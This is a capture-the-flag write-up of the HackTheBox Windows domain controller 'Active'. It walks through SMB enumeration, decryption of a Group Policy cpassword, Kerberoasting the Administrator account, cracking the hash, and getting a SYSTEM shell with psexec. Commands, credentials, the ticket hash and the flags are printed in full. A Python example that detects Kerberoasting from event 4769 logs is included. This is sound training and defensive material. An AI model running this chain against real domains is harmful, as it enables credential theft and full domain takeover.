| Machine Name | Difficulty | OS | Logo |
|---|---|---|---|
| Active - HTB | Easy | Windows | |
Walkthrough
Let's start with an Nmap scan.

```text
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 08:05 EDT
Nmap scan report for 10.10.10.100
Host is up (0.16s latency).
Not shown: 65512 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-27 12:30:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/27%OT=53%CT=1%CU=31977%PV=Y%DS=2%DC=T%G=Y%TM=60FFF9C
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%TS=7)OPS(O1=M54BNW8ST11%O2=M54
OS:BNW8ST11%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)WIN(W
OS:1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%
OS:O=M54BNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD
OS:=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%
OS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 13m01s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-27T12:32:20
|_ start_date: 2021-07-27T05:05:54
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 189.49 ms 10.10.16.1
2 73.41 ms 10.10.10.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 811.04 seconds
```
It is clearly a domain controller, and our domain name is active.htb.

Let's start enumerating SMB straight away. I'm sharing the notable parts of the enum4linux output below.

```text
=========================================
| Share Enumeration on 10.10.10.100 |
=========================================
[V] Attempting to get share list using authentication
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.100
[V] Attempting map to share //10.10.10.100/ADMIN$ with command: smbclient -W '' //'10.10.10.100'/'ADMIN$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/ADMIN$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/C$ with command: smbclient -W '' //'10.10.10.100'/'C$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/C$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/IPC$ with command: smbclient -W '' //'10.10.10.100'/'IPC$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED
[V] Attempting map to share //10.10.10.100/NETLOGON with command: smbclient -W '' //'10.10.10.100'/'NETLOGON' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/NETLOGON Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/Replication with command: smbclient -W '' //'10.10.10.100'/'Replication' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/Replication Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/SYSVOL with command: smbclient -W '' //'10.10.10.100'/'SYSVOL' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/SYSVOL Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/Users with command: smbclient -W '' //'10.10.10.100'/'Users' -U''%'' -c dir 2>&1
//10.10.10.100/Users Mapping: DENIED, Listing: N/A
```
Checking with smbmap gives the same result.

```text
┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbmap -u "" -p "" -H 10.10.10.100 2 ⨯
[+] IP: 10.10.10.100:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
```
Now let's connect with smbclient and have a look at what is inside. There were Group Policies in there, and I started wondering whether I could recover a user password from them. The article at https://adsecurity.org/?p=2288 explains this topic. After digging around, I found user credentials.

```text
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
Groups.xml A 533 Wed Jul 18 16:46:06 2018
10459647 blocks of size 4096. 5727923 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.6 KiloBytes/sec) (average 0.9 KiloBytes/sec)
```
When we read this file, the SVC_TGS user's password was sitting there waiting to be decrypted.

```text
┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```
I downloaded the ps1 script used in the link above, opened PowerShell on Kali and decrypted the password. (https://raw.githubusercontent.com/obscuresec/PowerShell/master/Get-DecryptedCpassword)

```text
┌──(root💀kali)-[~/oscp/htb/Active]
└─# pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
https://aka.ms/powershell
Type 'help' to get help.
PS /root/oscp/htb/Active> ls
'a a' enum4linuxResult Get-DecryptedCpassword.ps1 GPE.INI GPT.INI GptTmpl.inf Groups.xml
PS /root/oscp/htb/Active> Import-Module ./Get-DecryptedCpassword.ps1
PS /root/oscp/htb/Active> Get-DecryptedCpassword "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
PS /root/oscp/htb/Active> exit
```
Now we have a user. I still couldn't get a shell, so I ran the SMB enumeration again to see whether this user could read the shares I couldn't read before.

```text
=========================================
| Share Enumeration on 10.10.10.100 |
=========================================
[V] Attempting to get share list using authentication
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.10.100
[V] Attempting map to share //10.10.10.100/ADMIN$ with command: smbclient -W '' //'10.10.10.100'/'ADMIN$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/ADMIN$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/C$ with command: smbclient -W '' //'10.10.10.100'/'C$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/C$ Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/IPC$ with command: smbclient -W '' //'10.10.10.100'/'IPC$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/IPC$ [E] Can't understand response:
NT_STATUS_INVALID_PARAMETER listing \*
[V] Attempting map to share //10.10.10.100/NETLOGON with command: smbclient -W '' //'10.10.10.100'/'NETLOGON' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/NETLOGON Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/Replication with command: smbclient -W '' //'10.10.10.100'/'Replication' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/Replication Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/SYSVOL with command: smbclient -W '' //'10.10.10.100'/'SYSVOL' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/SYSVOL Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/Users with command: smbclient -W '' //'10.10.10.100'/'Users' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
//10.10.10.100/Users Mapping: OK, Listing: OK
```
With this user we have more access.

```text
┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbmap -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -H 10.10.10.100 1 ⨯
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
```
That is how I got the first flag.

```text
┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbclient -W '' //'10.10.10.100'/'Users' -U'SVC_TGS'%'GPPstillStandingStrong2k18' 2>&1
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5727623 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
cd
10459647 blocks of size 4096. 5727623 blocks available
smb: \SVC_TGS\> cd Desktop\
lsmb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt A 34 Sat Jul 21 11:06:25 2018
10459647 blocks of size 4096. 5727623 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat user.txt
86d67d8ba232bb6a254aa4d10159e983
```
By now I'd had a shower, and I ran BloodHound. Time to gather information through LDAP queries.

```text
┌──(root💀kali)-[~/oscp/htb/Active/bloodhound]
└─# bloodhound-python -u SVC_TGS -p GPPstillStandingStrong2k18 -d active.htb -ns 10.10.10.100 -c all
INFO: Found AD domain: active.htb
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 4 users
INFO: Found 40 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb
```
While going through the BloodHound data I discovered that the Administrator user has an SPN set. So I immediately requested a service ticket for it, but got an error.

```text
┌──(root💀kali)-[~/oscp/htb/Active]
└─# python3 /root/tool/AD/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request 1 ⨯
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2021-01-21 11:07:03.723783
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
```
When you get an error like this, you need to synchronise your clock with the DC (https://book.hacktricks.xyz/windows/active-directory-methodology/kerberoast).

```text
┌──(root💀kali)-[~/oscp/htb/Active]
└─# ntpdate 10.10.10.100
27 Jul 09:51:18 ntpdate[2257]: step time server 10.10.10.100 offset +781.865165 sec
```
Let's try again.

```text
┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat /etc/resolv.conf
nameserver 10.10.10.100
┌──(root💀kali)-[~/oscp/htb/Active]
└─# python3 /root/tool/AD/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2021-01-21 11:07:03.723783
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$27a9be7702cf025d854f726fe25fdffd$a127e1b0d9ed078c32358ae41887465201c909d4e8ce32b95e708b421c53a5b9e290f2a6ba1cdc96d1ce95adf32c8559672c7a2d870c2b6db4f412561dd983cca2fcbc4c065e2a90068d285a3724cdc9231121eed47404dde01dcd2209b86379c13ab5c1d167cc6acd679c827f0ba1e5d5b513050e8bd6d2e7b9a35ae78ed26355832819ac348123cbd1c7269ff328c7c061dc28e743dca66a5d701da71cf7390a6acf00f9d1679d5fc6e7741f71e2d2b3bb751cdaa389756461423e2c8545c116f816a51e8efbbd0fe5b83cee135f9f870889cf9deeedd03da60155e92aa08c8fc73c1a6da5b591972409fe7eaa3d0908e04cde1060c3f8a6e4c5e2d1fac10fa5e2d6e042c054ed186553d1c08606b27fdf2bdaf3962c794c57423d4aecbc7eda24417cb41a125ba13fe4b8a4dfde5c600132f846d25b28d215118db3bb13b21f20d3661e7bd06a4ef1b287bc828303fda8e7e23d415a512b5e274282af3491309a146624d7078a1b7d206b3bc674ee5b0594324c4e2f47fc2594e076c018b41e357d6e28086b9221fa84fe75f2e31230108261fcd1e2e861f850ba13b8bb62f2951d58f0aa35dfec0ac4cbe3c328169fcfdf1af0f58aec8adc4e912b4e94c85f31bc6a322ec583c520ce3951f17da872f021cc2b1a94daa1a223d7151d242617640452b374b79cb0fff429c4a6cf944c6b6565b275bc9ace246fb86fac6f9ecb417a87bb258e848126edda737dbbcaaa7d2c55dfde8c02f0511007b445cbfa93f2cd036081418b08dff899543c875f11810ff730dd0c503c87bd1c1705ceec297a3e62f5f0cfa9a466833799bdd072546686d35010937c27b5f94f22384cd7be16a24920fd58bc6421c45962eddf9b9aaba4c3dc89f5896bf1d9f87bd26b55eac96603de1ad65dd4036b3ba64b1160411946e41a54e088b127f4e17b70f8660bdde4a0adaddbbf4c9f8f262c2e98f7ad66f79c870b9d1f06c0bf5cf19f1386f18f3eec0865c256c54645ec90237b9841cfe5ad0ecea41b7755330b7e065636b96d84c6bdcb66029b8c5327fc32df3a036631bc406f485ea9e919ad0e06c8cc1c1bd3fc8507612c8d4c7af0ce1707fe0bb00966d846202c7116a49aebbbda02e5451693a3f17665a69127c438bfef8c07606e83e468c701d723a18705bfc83d0e4e48bd58464eb20eb6680c1537b7c61ad6a25aefab47605533f0c8fd44acaf98cc002dee0cc221c93148df0ab4a9a330381d04ce891e6588ef
```
Great, now let's crack it.

```text
┌──(root💀kali)-[~/oscp/htb/Active]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2021-07-27 09:52) 0.2132g/s 2246Kp/s 2246Kc/s 2246KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
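Seen from the DC, the ticket requested and cracked above is a single Security event 4769 whose ticket encryption type is 0x17 (RC4-HMAC, the "etype 23" john reports). The Python below is an added example, not part of this post or of Impacket, and shows the two checks a SOC would run over such events: any successful RC4 service-ticket request for a non-machine account, and one principal requesting tickets for several distinct services within a short window. The event records are constructed for illustration (the field subset, timestamps, the 10.10.16.5 source and the jdoe account are invented); 0x17, 0x12 and failure code 0x25 (KRB_AP_ERR_SKEW, the same error the post hit before running ntpdate) are the real Windows/Kerberos values.

```python
"""Flag Kerberoasting-style TGS requests in Security event 4769 records.

Added example, not from the post or from Impacket. The records below are
constructed; the encryption-type and failure codes are the real Kerberos values.
Standard library only.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"         # 4769 TicketEncryptionType for RC4-HMAC (source of etype 23 hashes)
AES256 = "0x12"           # AES256-CTS-HMAC-SHA1-96, what current clients negotiate
KRB_AP_ERR_SKEW = "0x25"  # 4769 failure code when the client clock is more than 5 minutes off

# Constructed 4769 events: subset of fields (TargetUserName, IpAddress, ServiceName,
# TicketEncryptionType, Status). 10.10.16.5, 10.10.10.50 and jdoe are invented.
EVENTS = [
    {"time": "2021-07-27 09:38:55", "user": "SVC_TGS@ACTIVE.HTB", "ip": "10.10.16.5",
     "service": "Administrator", "etype": RC4_HMAC, "status": KRB_AP_ERR_SKEW},
    {"time": "2021-07-27 09:40:00", "user": "jdoe@ACTIVE.HTB", "ip": "10.10.10.50",
     "service": "DC$", "etype": AES256, "status": "0x0"},
    {"time": "2021-07-27 09:41:10", "user": "jdoe@ACTIVE.HTB", "ip": "10.10.10.50",
     "service": "svc_sql", "etype": AES256, "status": "0x0"},
    {"time": "2021-07-27 09:52:01", "user": "SVC_TGS@ACTIVE.HTB", "ip": "10.10.16.5",
     "service": "Administrator", "etype": RC4_HMAC, "status": "0x0"},
    {"time": "2021-07-27 09:52:02", "user": "SVC_TGS@ACTIVE.HTB", "ip": "10.10.16.5",
     "service": "svc_sql", "etype": RC4_HMAC, "status": "0x0"},
    {"time": "2021-07-27 09:52:02", "user": "SVC_TGS@ACTIVE.HTB", "ip": "10.10.16.5",
     "service": "svc_backup", "etype": RC4_HMAC, "status": "0x0"},
]


def _parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def is_user_service(name):
    """Machine accounts (DC$) and krbtgt are noise for these rules; user SPNs are the target."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def rc4_service_tickets(events):
    """Rule 1: successful service-ticket requests for user accounts with RC4 encryption."""
    return [e for e in events
            if e["status"] == "0x0" and e["etype"] == RC4_HMAC and is_user_service(e["service"])]


def spn_sweeps(events, window=timedelta(minutes=5), threshold=3):
    """Rule 2: one principal requesting tickets for >= threshold distinct user services inside window."""
    by_user = defaultdict(list)
    for e in events:
        if e["status"] == "0x0" and is_user_service(e["service"]):
            by_user[e["user"]].append((_parse_time(e["time"]), e["service"]))
    alerts = []
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            # Sliding window anchored at each request; report the first hit per user only.
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                alerts.append({"user": user, "services": sorted(services), "start": start})
                break
    return alerts


def skew_failures(events):
    """Context: a 0x25 failure from an unusual source is worth correlating with later TGS activity."""
    return [e for e in events if e["status"] == KRB_AP_ERR_SKEW]


def run(events=EVENTS):
    return {"rc4_tickets": rc4_service_tickets(events),
            "spn_sweeps": spn_sweeps(events),
            "skew_failures": skew_failures(events)}


if __name__ == "__main__":
    r = run()
    for e in r["rc4_tickets"]:
        print(f"RC4 ticket: {e['user']} -> {e['service']} from {e['ip']} at {e['time']}")
    for a in r["spn_sweeps"]:
        print(f"SPN sweep: {a['user']} requested {a['services']} within 5 min of {a['start']}")
    for e in r["skew_failures"]:
        print(f"Clock-skew failure: {e['user']} from {e['ip']} at {e['time']}")
```

Rule 1 is only low-noise once the domain's service accounts have AES keys and the `msDS-SupportedEncryptionTypes` attribute is set so that clients stop negotiating RC4; in a mixed 2008 R2 domain like this one, RC4 tickets are routine and rule 2 (the burst of distinct SPNs from one principal) carries more weight. The fix for the finding itself is the same either way: a long, random password on any user account that has an SPN, or a group managed service account.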
```text
┌──(root💀kali)-[~/tool/AD/impacket/examples]
└─# python3 psexec.py Administrator:[email protected]
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file ONeZjpOH.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service iDPJ on 10.10.10.100.....
[*] Starting service iDPJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Administrator\Desktop\
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 2AF3-72E4
Directory of C:\Users\Administrator\Desktop
21/01/2021 07:49 úú <DIR> .
21/01/2021 07:49 úú <DIR> ..
21/07/2018 06:06 úú 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 23.460.220.928 bytes free
C:\Users\Administrator\Desktop>type root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b
C:\Users\Administrator\Desktop>
```